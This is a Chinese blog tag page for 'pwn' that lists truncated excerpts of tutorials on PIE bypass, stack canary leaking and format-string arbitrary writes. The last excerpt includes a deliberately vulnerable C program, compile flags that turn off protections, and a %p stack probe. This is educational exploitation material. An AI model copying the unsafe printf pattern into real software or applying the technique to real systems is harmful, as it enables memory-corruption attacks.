包含标签 pwn 的文章

pie绕过

pie PIE(Position Independent Executable,可移植执行码)是一种特殊的执行文件格式,常用于保护程序执行空间的受限和安全性。使用 PIE 能够让加载到内存的代码不会固定地映射到特定的地址,每次加载时都能让其他程序更难预测它想要加载到哪里。 代码重定位的例子有:加载时技术(load-ti……

阅读全文

stack canary泄露方法

什么是canary security cookies,Assume that at the beginning of a function call (e.g. during its prologue) we are saving a value in the function’s stack frame, we would expect (! if everything went well !) to read the same value just before the function exits or namely at its epilogue. If the value has changed, then the execution of the program will be terminated and an error message will be displayed. [1] Obviously, this protection mechanism is added by the compiler during the compilation process. For the GNU Compiler Collection (gcc), it is implemented via the StackGuard extension which was added to gcc 2.7.2.2 [1] Bypass stack canary 漏洞程……

阅读全文

字符串漏洞:任意写

vuln.c #include <stdio.h> int auth = 0; int main() { char password[100]; puts("Password: "); fgets(password, sizeof password, stdin); printf(password); printf("Auth is %i\n", auth); if(auth == 10) { puts("Authenticated!"); } } 程序分析 程序保护 gcc -m32 -no-pie -fno-stack-protector -z execstack vuln.c -o vuln $ checksec --file=./vuln [*] '/home/kali/exploits/str_arb_write/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 栈布局 $ ./vuln Password: %p %p %p %p %p %p %p %p %p %p %p 0x64 0xf7e1d620 0x804918d 0xf7ffdbac 0x1 0xf7fc17c0 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 Auth is 0 ascii hex % 0x25 " " 0x20 p 0x70 第7个dword存放格式化字符串 3. 构建利用栈 栈偏移 栈内容……

阅读全文